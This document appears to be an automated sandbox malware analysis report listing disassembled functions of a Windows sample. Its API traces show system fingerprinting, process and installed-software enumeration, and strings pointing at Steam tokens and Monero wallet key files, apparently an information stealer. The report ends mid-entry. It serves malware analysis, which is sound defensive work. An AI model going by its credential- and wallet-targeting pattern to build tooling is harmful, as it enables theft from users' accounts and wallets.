Part of subcall function 0055A9B0: lstrcpy.KERNEL32(00000000), ref: 0055AA04
Part of subcall function 0055A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0055AA12

Part of subcall function 0055A8A0: lstrcpy.KERNEL32(?,00560E17), ref: 0055A905

Part of subcall function 00557500: GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00557542
Part of subcall function 00557500: GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0055757F
Part of subcall function 00557500: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00557603
Part of subcall function 00557500: RtlAllocateHeap.NTDLL(00000000), ref: 0055760A

Part of subcall function 0055A920: lstrcpy.KERNEL32(00000000,?), ref: 0055A972
Part of subcall function 0055A920: lstrcat.KERNEL32(00000000), ref: 0055A982

Part of subcall function 00557690: GetProcessHeap.KERNEL32(00000000,00000104), ref: 005576A4
Part of subcall function 00557690: RtlAllocateHeap.NTDLL(00000000), ref: 005576AB

Part of subcall function 005577C0: GetCurrentProcess.KERNEL32(00000000,?,?,?,?,?,00000000,0055DBC0,000000FF,?,00551C99,00000000,?,0127D058,00000000,?), ref: 005577F2
Part of subcall function 005577C0: IsWow64Process.KERNEL32(00000000,?,?,?,?,?,00000000,0055DBC0,000000FF,?,00551C99,00000000,?,0127D058,00000000,?), ref: 005577F9

Part of subcall function 00557850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,005411B7), ref: 00557880
Part of subcall function 00557850: RtlAllocateHeap.NTDLL(00000000), ref: 00557887
Part of subcall function 00557850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0055789F

Part of subcall function 005578E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00557910
Part of subcall function 005578E0: RtlAllocateHeap.NTDLL(00000000), ref: 00557917
Part of subcall function 005578E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0055792F

Part of subcall function 00557980: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00560E00,00000000,?), ref: 005579B0
Part of subcall function 00557980: RtlAllocateHeap.NTDLL(00000000), ref: 005579B7
Part of subcall function 00557980: GetLocalTime.KERNEL32(?,?,?,?,?,00560E00,00000000,?), ref: 005579C4
Part of subcall function 00557980: wsprintfA.USER32 ref: 005579F3

Part of subcall function 00557A30: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,0127D9E8,00000000,?,00560E10,00000000,?,00000000,00000000), ref: 00557A63
Part of subcall function 00557A30: RtlAllocateHeap.NTDLL(00000000), ref: 00557A6A
Part of subcall function 00557A30: GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,0127D9E8,00000000,?,00560E10,00000000,?,00000000,00000000,?), ref: 00557A7D

Part of subcall function 00557B00: GetUserDefaultLocaleName.KERNEL32(00000055,00000055,?,?,?,00000000,00000000,?,0127D9E8,00000000,?,00560E10,00000000,?,00000000,00000000), ref: 00557B35

Part of subcall function 00557B90: GetKeyboardLayoutList.USER32(00000000,00000000,005605AF), ref: 00557BE1
Part of subcall function 00557B90: LocalAlloc.KERNEL32(00000040,?), ref: 00557BF9
Part of subcall function 00557B90: GetKeyboardLayoutList.USER32(?,00000000), ref: 00557C0D
Part of subcall function 00557B90: GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00557C62
Part of subcall function 00557B90: LocalFree.KERNEL32(00000000), ref: 00557D22

Part of subcall function 00557D80: GetSystemPowerStatus.KERNEL32(?), ref: 00557DAD

GetCurrentProcessId.KERNEL32(00000000,?,0127D0B8,00000000,?,00560E24,00000000,?,00000000,00000000,?,0127D820,00000000,?,00560E20,00000000), ref: 0055207E

Part of subcall function 00559470: OpenProcess.KERNEL32(00000410,00000000,?), ref: 00559484
Part of subcall function 00559470: K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 005594A5
Part of subcall function 00559470: CloseHandle.KERNEL32(00000000), ref: 005594AF

Part of subcall function 00557E00: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00557E37
Part of subcall function 00557E00: RtlAllocateHeap.NTDLL(00000000), ref: 00557E3E
Part of subcall function 00557E00: RegOpenKeyExA.KERNEL32(80000002,0126B850,00000000,00020119,?), ref: 00557E5E
Part of subcall function 00557E00: RegQueryValueExA.KERNEL32(?,0127D178,00000000,00000000,000000FF,000000FF), ref: 00557E7F
Part of subcall function 00557E00: RegCloseKey.ADVAPI32(?), ref: 00557E92

Part of subcall function 00557F60: GetLogicalProcessorInformationEx.KERNELBASE(0000FFFF,00000000,00000000), ref: 00557FC9
Part of subcall function 00557F60: GetLastError.KERNEL32 ref: 00557FD8

Part of subcall function 00557ED0: GetSystemInfo.KERNEL32(00560E2C), ref: 00557F00
Part of subcall function 00557ED0: wsprintfA.USER32 ref: 00557F16

Part of subcall function 00558100: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,0127D838,00000000,?,00560E2C,00000000,?,00000000), ref: 00558130
Part of subcall function 00558100: RtlAllocateHeap.NTDLL(00000000), ref: 00558137
Part of subcall function 00558100: GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00558158
Part of subcall function 00558100: __aulldiv.LIBCMT ref: 00558172
Part of subcall function 00558100: __aulldiv.LIBCMT ref: 00558180
Part of subcall function 00558100: wsprintfA.USER32 ref: 005581AC

Part of subcall function 005587C0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00560E28,00000000,?), ref: 0055882F
Part of subcall function 005587C0: RtlAllocateHeap.NTDLL(00000000), ref: 00558836
Part of subcall function 005587C0: wsprintfA.USER32 ref: 00558850

Part of subcall function 00558320: RegOpenKeyExA.KERNEL32(00000000,0127B0E0,00000000,00020019,00000000,005605B6), ref: 005583A4

Part of subcall function 00558320: RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00558426
Part of subcall function 00558320: wsprintfA.USER32 ref: 00558459
Part of subcall function 00558320: RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 0055847B
Part of subcall function 00558320: RegCloseKey.ADVAPI32(00000000), ref: 0055848C
Part of subcall function 00558320: RegCloseKey.ADVAPI32(00000000), ref: 00558499

Part of subcall function 00558680: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,005605B7), ref: 005586CA
Part of subcall function 00558680: Process32First.KERNEL32(?,00000128), ref: 005586DE
Part of subcall function 00558680: Process32Next.KERNEL32(?,00000128), ref: 005586F3
Part of subcall function 00558680: CloseHandle.KERNEL32(?), ref: 00558761

lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,00000000,?,00000000,00000000,00000000), ref: 0055265B

Memory Dump Source

Source File: 00000000.00000002.2301065818.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true

Associated: 00000000.00000002.2301049191.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000059A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000062F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000064F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000065E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000006E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.0000000000705000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A03000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301771483.0000000000A3E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301871395.0000000000BD5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_540000_file.jbxd

Yara matches

Similarity

API ID: Heap$Process$Allocate$Closewsprintf$NameOpenlstrcpy$InformationLocal$CurrentHandleInfoKeyboardLayoutListLocaleProcess32StatusSystemTimeUser__aulldivlstrcatlstrlen$AllocComputerCreateDefaultDirectoryEnumErrorFileFirstFreeGlobalLastLogicalMemoryModuleNextPowerProcessorQuerySnapshotToolhelp32ValueVolumeWindowsWow64Zone
String ID:
API String ID: 3113730047-0
Opcode ID: eea1455dbc9e7c1cb9c120d700ef032b1efbf0dcb45e5359f68640470362be5d
Instruction ID: e732de6c76b68cc188f5a9323d66780e2189bcacb0dc3919204905bb840997d2
Opcode Fuzzy Hash: eea1455dbc9e7c1cb9c120d700ef032b1efbf0dcb45e5359f68640470362be5d
Instruction Fuzzy Hash: 22726D72810119AADB19EB90DCBADEE773CBF94301F50439AB91662491EF303B4DCB65

Function 00546D40 Relevance: 3.2, APIs: 2, Instructions: 157COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2301065818.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true

Associated: 00000000.00000002.2301049191.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000059A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000062F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000064F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000065E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000006E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.0000000000705000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A03000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301771483.0000000000A3E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301871395.0000000000BD5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_540000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c775f0ae2c42161d3e4a3210a1e934a218358fd3b8c2fa4a07df2aa380b96a0a
Instruction ID: 3051ccbd5fc4ee1393cdde5b4ac12a35d65601ff033fd4fbb44e980008c24c03
Opcode Fuzzy Hash: c775f0ae2c42161d3e4a3210a1e934a218358fd3b8c2fa4a07df2aa380b96a0a
Instruction Fuzzy Hash: 6A614CB4D00209EFCB14CF94D988BEEBBB0BB45308F108598E41967285D735AF94DF92

Function 00555100 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 40stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0055A740: lstrcpy.KERNEL32(00560E17,00000000), ref: 0055A788

Part of subcall function 0055A820: lstrlen.KERNEL32(00544F05,?,?,00544F05,00560DDE), ref: 0055A82B
Part of subcall function 0055A820: lstrcpy.KERNEL32(00560DDE,00000000), ref: 0055A885

lstrlen.KERNEL32(00000000,00000000,00560ACA), ref: 0055512A

Strings

steam_tokens.txt, xrefs: 0055513F

Memory Dump Source

Source File: 00000000.00000002.2301065818.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true

Associated: 00000000.00000002.2301049191.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000059A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000062F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000064F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000065E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000006E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.0000000000705000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A03000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301771483.0000000000A3E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301871395.0000000000BD5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_540000_file.jbxd

Yara matches

Similarity

API ID: lstrcpylstrlen
String ID: steam_tokens.txt
API String ID: 2001356338-401951677
Opcode ID: 5e6595dd8eb3398582a654507cba8d9408d7fecca1ccf6130368ce83e584e369
Instruction ID: d61c4fd7b9bb2c31aae7e75cd91d10676826f182412fd51b732328ccdd7c91df
Opcode Fuzzy Hash: 5e6595dd8eb3398582a654507cba8d9408d7fecca1ccf6130368ce83e584e369
Instruction Fuzzy Hash: 2FF0BB7191010966DB04FBB0EC6B9ED7F3CBA94341F40425AB85662492FF24660DC6A6

Function 00557ED0 Relevance: 3.0, APIs: 2, Instructions: 34COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(00560E2C), ref: 00557F00
wsprintfA.USER32 ref: 00557F16

Memory Dump Source

Source File: 00000000.00000002.2301065818.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true

Associated: 00000000.00000002.2301049191.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000059A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000062F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000064F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000065E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000006E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.0000000000705000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A03000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301771483.0000000000A3E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301871395.0000000000BD5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_540000_file.jbxd

Yara matches

Similarity

API ID: InfoSystemwsprintf
String ID:
API String ID: 2452939696-0
Opcode ID: 3b61435ad63bac9346a3acecd4e2e65115c0f1753d9ad0779de6b6074cb91c03
Instruction ID: 1df7233454dbfd13f09ac5c4354f809fdc53ee7e3ce1b87e25972f9d28550cd6
Opcode Fuzzy Hash: 3b61435ad63bac9346a3acecd4e2e65115c0f1753d9ad0779de6b6074cb91c03
Instruction Fuzzy Hash: 5EF096B1A44208FBD710CF85DC45FAAFBBCFB48724F10466AF91593280D77959448BE5

Function 0054B4F0 Relevance: 2.9, APIs: 2, Instructions: 397stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0055A740: lstrcpy.KERNEL32(00560E17,00000000), ref: 0055A788

Part of subcall function 0055A9B0: lstrlen.KERNEL32(?,01278970,?,\Monero\wallet.keys,00560E17), ref: 0055A9C5
Part of subcall function 0055A9B0: lstrcpy.KERNEL32(00000000), ref: 0055AA04
Part of subcall function 0055A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0055AA12

Part of subcall function 0055A920: lstrcpy.KERNEL32(00000000,?), ref: 0055A972
Part of subcall function 0055A920: lstrcat.KERNEL32(00000000), ref: 0055A982

Part of subcall function 0055A8A0: lstrcpy.KERNEL32(?,00560E17), ref: 0055A905

Part of subcall function 0055A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0055A7E6

lstrlen.KERNEL32(00000000), ref: 0054B9C2
lstrlen.KERNEL32(00000000), ref: 0054B9D6

Memory Dump Source

Source File: 00000000.00000002.2301065818.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true

Associated: 00000000.00000002.2301049191.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000059A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000062F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000064F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000065E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000006E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.0000000000705000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A03000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301771483.0000000000A3E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301871395.0000000000BD5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_540000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat
String ID:
API String ID: 2500673778-0
Opcode ID: 53458c811635e29a191fc34883cdec267b9a76c4fcf559da23fcbcef824fa5d2
Instruction ID: 5148518a7a68b733e4c56a07f88ab8444c6ac31751b88016846070da3b9280c1
Opcode Fuzzy Hash: 53458c811635e29a191fc34883cdec267b9a76c4fcf559da23fcbcef824fa5d2
Instruction Fuzzy Hash: 78E112729101199BDB14FBA0CCAADEE7B38BF94301F50465AF90762091EF347A4DCB66

Function 0054AEF0 Relevance: 2.7, APIs: 2, Instructions: 236stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0055A740: lstrcpy.KERNEL32(00560E17,00000000), ref: 0055A788

Part of subcall function 0055A9B0: lstrlen.KERNEL32(?,01278970,?,\Monero\wallet.keys,00560E17), ref: 0055A9C5
Part of subcall function 0055A9B0: lstrcpy.KERNEL32(00000000), ref: 0055AA04
Part of subcall function 0055A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0055AA12

Part of subcall function 0055A920: lstrcpy.KERNEL32(00000000,?), ref: 0055A972
Part of subcall function 0055A920: lstrcat.KERNEL32(00000000), ref: 0055A982

Part of subcall function 0055A8A0: lstrcpy.KERNEL32(?,00560E17), ref: 0055A905

lstrlen.KERNEL32(00000000), ref: 0054B16A
lstrlen.KERNEL32(00000000), ref: 0054B17E

Part of subcall function 0055A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0055A7E6

Memory Dump Source

Source File: 00000000.00000002.2301065818.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true

Associated: 00000000.00000002.2301049191.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000059A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000062F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000064F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000065E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000006E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.0000000000705000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A03000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301771483.0000000000A3E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301871395.0000000000BD5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_540000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat
String ID:
API String ID: 2500673778-0
Opcode ID: e50d84e3c8af4a88549f29834cd872eeb98a2682a323ac75edff1dc68bad7adf
Instruction ID: 02c59dc318db0575147f1ba0cce6a1d12f87cf05abed92aac46df865909dae2a
Opcode Fuzzy Hash: e50d84e3c8af4a88549f29834cd872eeb98a2682a323ac75edff1dc68bad7adf
Instruction Fuzzy Hash: 3F9123729101199BDB04EBA0DC69DEE7B38BF94301F50425AF907A7091EF346A0DCB66

Function 0054B230 Relevance: 2.7, APIs: 2, Instructions: 205stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0055A740: lstrcpy.KERNEL32(00560E17,00000000), ref: 0055A788

Part of subcall function 0055A9B0: lstrlen.KERNEL32(?,01278970,?,\Monero\wallet.keys,00560E17), ref: 0055A9C5
Part of subcall function 0055A9B0: lstrcpy.KERNEL32(00000000), ref: 0055AA04
Part of subcall function 0055A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0055AA12

Part of subcall function 0055A920: lstrcpy.KERNEL32(00000000,?), ref: 0055A972
Part of subcall function 0055A920: lstrcat.KERNEL32(00000000), ref: 0055A982

Part of subcall function 0055A8A0: lstrcpy.KERNEL32(?,00560E17), ref: 0055A905

lstrlen.KERNEL32(00000000), ref: 0054B42E
lstrlen.KERNEL32(00000000), ref: 0054B442

Part of subcall function 0055A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0055A7E6

Memory Dump Source

